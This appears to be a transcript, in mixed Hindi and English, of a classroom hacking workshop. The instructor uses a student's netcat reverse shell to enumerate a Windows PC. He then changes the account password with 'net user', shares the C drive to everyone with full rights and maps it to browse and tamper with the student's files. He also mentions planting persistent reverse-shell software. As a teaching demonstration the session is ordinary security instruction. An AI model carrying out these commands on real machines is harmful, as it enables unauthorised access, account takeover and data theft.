सारे खिलाड़ी है क्या?
तुम करोगी कनेक्ट, आओ ठीक है। अब देखो क्या करना है। सो नाउ व्हाट विल डू, लेट्स से आई हैव ओपन द सर्वर nc.exe -lbp 6789। चलो कम ऑन कनेक्ट टू मी। सब डर गए, ऐसा क्या हो गया? आओ करो करो, कौन कर रहा है कनेक्ट? तुम कर रहे हो ऋषभ? करो करो करो। ओके नाउ यू सी, सो व्हाट आई हैव जस्ट गॉट, इसने कनेक्ट किया फ्रॉम द यूजर पीसी 60420 पोर्ट नंबर। अब ये जो शेल आया है ये किसका है? इसका है, ठीक है। अब देखो लेट्स से सबसे पहले तो मैंने हु एम आई चेक किया, हु इज द यूजर। मुझे इससे पता चल गया कि इसका जो यूजर नेम है वो यूजर नाम का यूजर नेम है, ठीक है। सेकेंड चीज में क्या करूं, दूसरी चीज मैंने चेक करी fs util fs info ड्राइव्स, इसके कंप्यूटर में कितनी ड्राइव्स हैं, ठीक है। तो मुझे इसको दिख रहा है कि इसके पास सी ड्राइव है, डी ड्राइव है, ई ड्राइव है, एफ ड्राइव है, जी ड्राइव है, एच ड्राइव है, काफी है इसके पास मामला, ठीक है। उसके बाद में मैंने इसकी मशीन का आईपी कॉन्फ़िगरेशन चेक किया /all, ठीक है। तो मैक वैक और वो सारी इंफॉर्मेशन जो भी है इसकी वो तो मेरे पास आ ही गई, ये रहा इसका, ठीक है ना, क्लियर। सो आई हैव एक्सेस टू हिज ब्रॉडकॉम मशीन एंड हिज आईपी एड्रेस, मैक एड्रेस, आई हैव ऑल द इंफॉर्मेशन, ठीक। अब देखो नाउ व्हाट आई कैन डू इज आई कैन सिंपली डू DIR एंड आई कैन सी इसकी कंप्यूटर में कॉन्च्यूरिंग 2 और क्या क्या चीजें पड़ी हुई है, बाहुबली, ओके। देखते जाओ मजा देखते जाओ अभी, ठीक है, समझ में आ रहा है। आप देखो अब क्या है, देखते जाओ, ठीक है। हाँ तो हम उसे प्रोग्राम देंगे ना, बाद में बताएंगे ना, वो तो हम बाद में बताएंगे ना आपको, पहले दिन कैसे बता देंगे, पैसा वसूल हो जाएगा ना पहले दिन ही फिर आपको ना, ठीक है। समझ में आया, कॉन्सेप्ट को समझो, कॉन्सेप्ट किसी और के कंप्यूटर में कुछ नहीं होता है ऐसा हैक करने का, इसलिए पहले कॉन्सेप्ट समझो तब तुम्हें मजा आएगा, ठीक है ना। अब देखो ठीक है, मिल गया सी ड्राइव। अब पहली चीज हम क्या करते हैं, जनरली हम क्या करते हैं ना, शेयर कर देते हैं डिटेल्स, ठीक है, नेट शेयर कमांड्स के थ्रू। तो उससे क्या होता है, हमें ग्राफिकल एक्सेस मिल जाती है चीजों की, ठीक है, हमें शेल मेंटेन करके रखना नहीं पड़ता। क्या होती है वो कमांड, नेट शेयर, नेट शेयर इज द कमांड, ठीक है। नेट शेयर का जो कमांड है, अच्छा चलो एक चीज करते हैं पहले, जैसे मैं ये चीज करने से पहले मेरे को एक और चीज की जरूरत है। समटाइम्स व्हाट वी डू समथिंग लाइक दिस, नेट एसएच नेट यूजर, यूजर का नाम मुझे पता था यूजर है और मैंने पासवर्ड इसका चेंज कर दिया। एक मिनट, क्या है नेट यूजर, तुम्हारा ABCD से कनेक्टेड हो, अरे यार अच्छा मैं डिस्कनेक्ट हो गया क्या, तुम्हारा बंद हो गया, अच्छा अच्छा चलो एक बार दोबारा चलाना, हाँ एक बार दोबारा कनेक्ट करना, nc.exe -v 192.168.something 192.168.43.6789 -e ये देख लो, ठीक है, आ गया फिर दोबारा। अब देखो तो मैंने क्या किया, एक और चीज की, नेट यूजर से मैंने पहले चेक किया कि इसके अंदर कौन कौन सी यूजर है, तो हिज करंट यूजर इज कैपिटल USER, ठीक है। तो मैंने इसका नेट यूजर ABCDE पासवर्ड चेंज कर दिया सबसे पहले तो मैंने इसके मशीन में। अब इसका जो भी पासवर्ड था वो आई डोंट केयर, बट इसका पासवर्ड चेंज कर दिया मैंने, ठीक है। ABCDE हो गया अब इसका पासवर्ड मशीन। अब देखो ठीक है, अब मैं क्या करूंगा, या तो मैं पहले सर्च कर सकता था फाइल्स कि किस टाइप की फाइल्स में मैं इंटरेस्टेड हूँ इसकी, तो मैं ऐसे सर्च कर सकता हूँ dir/s/b और उसके बाद में लेट्स से star.mp4, तो नाउ इट विल सर्च फॉर mp4 फाइल्स इन C ड्राइव फर्स्ट, ठीक है। तो
So let's wait for a minute and see अगर है इसके पास. Hyphen slash S stands for search and B stands for कि you display the files. इस तरीके से कुछ है. एक बार dir का help check कर लो. dir/? एक मिल गई मुझे Zioing video something .mp4. फिर clips हैं इसकी WinSat के अंदर, परफॉर्मेंस के अंदर. पता नहीं क्या परफॉर्मेंस दे रहा है. ठीक है, वो तो हम बाद में चेक करेंगे. विन SXS, ये तो कुछ और ही लग रहा है मुझे वर्ड. ठीक है, चलो. ठीक है, क्लियर. तो मतलब यू कैन सर्च फॉर फाइल्स इन एनी वे. लेट्स गो टू D ड्राइव. लेट्स गो फॉर dir. तो D में ऋषभ का कुछ है. लेट्स गो टू E ड्राइव. E ड्राइव में ओहो काफी कुछ है. कॉन बूट एंड ये वो. ठीक है, क्लियर. लेट्स से अब देखो, इससे तो अच्छी मेरे को इसकी C ड्राइव ही लग रही थी. ठीक है, यहाँ पे कुछ है एक्समेन, एपोकैलिप्स और ये सब कुछ है. ठीक है, नाउ व्हाट वी विल डू, लेट्स से वी आर गोइंग टू मेक यूज ऑफ नेट शेयर कमांड. ओके, और नेट शेयर कमांड में आप क्या कर सकते हैं, यू कैन सेट द शेयर नेम, ड्राइव लेटर एंड पाथ. ओके, एंड यू कैन ग्रांट यूजर फुल एक्सेस. ठीक है, तो मैंने क्या किया, मैं इसकी ड्राइव शेयर कर दूंगा. नेट शेयर नेम, ठीक है, इज इक्वल टू C ड्राइव, मैंने शेयर कर दी. ठीक है, /grant everyone, full. ठीक है, शेयर कर दिया मैंने इसका फाइल. अब अगर मैं नेट शेयर एंटर करता हूं तो मुझे ये दिख रहा है कि इसकी C ड्राइव शेयर नेम के नाम से शेयर हो गई है. ठीक है, मैं चाहता तो इसका कुछ और नाम भी रख सकता था. जैसे शेयर नेम को बदल के मैं यहां पे इसकी कह सकता हूं, जैसे ऋषभ C के नाम से मैं इस ड्राइव को शेयर कर देता हूं. ठीक है, शेयर हो गई. अब अगर मैं नेट शेयर से चेक करता हूं तो यहां से देखोगे तो आपको ऋषभ C के नाम से भी दिखेगा कि एक C ड्राइव शेयर हो गई है. ठीक है, नाउ लेट्स सी. तो ये जो कंप्यूटर अभी है वो मैंने इसको कमांड प्रॉम्प्ट से एक्सेस कर रखा था. नाउ व्हाट आई विल डू, आई विल जस्ट गो टू माय कंप्यूटर, और माय कंप्यूटर से जाके मैं इसको ग्राफिकली एक्सेस करूंगा. ठीक है, कैसे, आई कैन गो टू माय कंप्यूटर, राइट क्लिक, और उस दिन आप सभी लोग उस वर्कशॉप में थे ना, क्लाउड कंप्यूटिंग वाली में. अब देखो क्लाउड का यूज कैसे करते हैं. शेयर कर दिया पहले इसका डेटा. अब विल गो टू मैप नेटवर्क ड्राइव. आईपी एड्रेस भी मुझे इसका पता है, आईपी कॉन्फ़िग से मैंने चेक किया था. तो /192.168.43. जो भी है इसका मैं एक बार चेक कर लेता हूं. आई विल चेक हिज आईपी एड्रेस, आईपी कॉन्फ़िग. ठीक है, आईपी कॉन्फ़िग में तुम्हारा फिर से डिस्कनेक्ट हो गया क्या? तुम बस अच्छा अपना आईपी बता दो, मुझे ज्यादा दिक्कत नहीं है तुम्हारे उससे. आईपी हम वैसे पहले ही चेक कर लेते हैं, लेकिन चलो इस बार नहीं चेक कर पाए तो अभी डाल देते हैं. ठीक है, 43.221. ठीक है, लेट्स से दिस इज दैट. एंड शेयर नेम इज RISHABH ऋषभ C. फिनिश किया. इसने मेरे से कनेक्शन मांगा, यूजर नेम और पासवर्ड. मुझे पता है यूजर, इसका यूजर नेम था, मैंने चेक कर दिया, और पासवर्ड ABCDE है, वो मैंने चेंज कर दिया. ओके किया. तो अब आप देखोगे तो उसकी ड्राइव मेरे पास. अब देखते हैं हम बाहुबली. तो हमने सिर्फ डबल क्लिक किया और हमारे पास अब चाहे बाहुबली हो या जो भी डेटा हो इसका, वो वी कैन एक्सेस. ठीक है, देखते हैं एक बार. नहीं क्यों नहीं होगी, मेरा अपडेट सब चलेगा यार. मेरा VLC शायद पुराना हो रहा है थोड़ा. विंडोज मीडिया भी तो चल सकती होगी ये. नहीं कहीं भी चल जाएगी. विंडोज मीडिया प्लेयर कहाँ है? विंडोज मीडिया सेंटर. Do you want to play this content?
हाँ यस, चलो ये तुम्हारी खैर MKV फाइल है, MKV तो नहीं चलेगी इस पर क्योंकि विंडोज़ तो मेरे ख्याल से MKV नहीं चलेगा। अच्छा सभी MKV हैं, कोई बात नहीं, चलो गेम्स देख लेते हैं। काउंटर स्ट्राइक, ग्लोबल ऑफेंसिव, ठीक है। तो in this case you can see that now even though his shell is disconnected but I have connection to his drive, okay। अब जब तक इसकी मशीन ऑन रहेगी तब तक ये मशीन मेरे साथ कनेक्टेड रहेगी एंड आई हैव फुल एक्सेस टू हिज मशीन। अब मैं यहाँ पे फाइल्स क्रिएट भी कर सकता हूँ, डिलीट भी कर सकता हूँ, इसका डेटा उड़ा भी सकता हूँ, कॉपी पेस्ट भी कर सकता हूँ, तो आई कैन डू एनीथिंग तब तक जब तक ये अभी मेरे नेटवर्क पे है या ऑनलाइन है या इंटरनेट पे कनेक्टेड है तो भी हो जाएगा। बहुत सारी जैसे फाइल डाउनलोड करते हैं कभी कुछ बहुत धीमी चीजें आ जाती हैं साथ में। हाँ और क्या, तुम्हारे सामने ही तो किया है मैंने। और अभी तुमने किया क्या, सिर्फ एक NC तो डाली है, कुछ नहीं पता चलेगा। You have your complete access is gone। Yes, तुम कुछ नई डायरेक्टरी क्रिएट करो। Yes, of course। Yes, yes। तुम बनाओ, इसमें एक डायरेक्टरी बनाओ, C ड्राइव में जाओ, डायरेक्टरी बनाओ, मेक अ डायरेक्टरी। नहीं C users, yes yes of course। ये लो तुम्हारे डाउनलोड्स, ठीक है। बैटलफील्ड, गेम ऑफ थ्रोन्स, ओहो लड़का बड़ा हो रहा है, पूरी सीरीज है इसके पास, ठीक है। खैर ये वाली फाइल से यहाँ नहीं चलेंगी, उससे चलेंगी VLC। नहीं, ही इज नॉट सेफ दो मेरा शायद VLC थोड़ा पुराना हो रहा है, अपडेट मांग रहा है। सर ये मान लो अभी डिस्कनेक्ट हो गए, ऑनलाइन से कहीं पे भी कनेक्ट हो तो आप फिर भी यूज कर सकते हो। नहीं, आई नीड टू नो हिज IP एड्रेस, ठीक है। वैसे अभी इस तरीके से नहीं कर सकता हूँ, बट और दूसरे बहुत सारे तरीके हैं जिनके थ्रू कर सकते हैं, ठीक है। तो उस केस में मैं इसके कंप्यूटर में एक ऐसे क्लाइंट प्रोग्राम डाल दूंगा, जब भी ये कहीं से भी इंटरनेट खोलेगा तो ऑटोमेटिकली वो प्रोग्राम इसका सारा एक्सेस मेरे कंप्यूटर को फॉरवर्ड कर देगा। आई हैव टू बी अ सर्वर, रिवर्स शेल हो जाएगा, ठीक है। क्लियर? सो यू अंडरस्टूड द पॉइंट कि हाउ थिंग्स कैन बी एक्सचेंज्ड ओवर द नेटवर्क। क्लियर? सो दिस इज हाउ वी विल प्रोसीड फर्दर। अब आगे अभी हम और कॉन्सेप्ट को समझेंगे, प्रैक्टिकली कैसे चीजें हो रही हैं, ठीक है। क्लियर? नाउ सो टुडेज सेशन इज आई गेस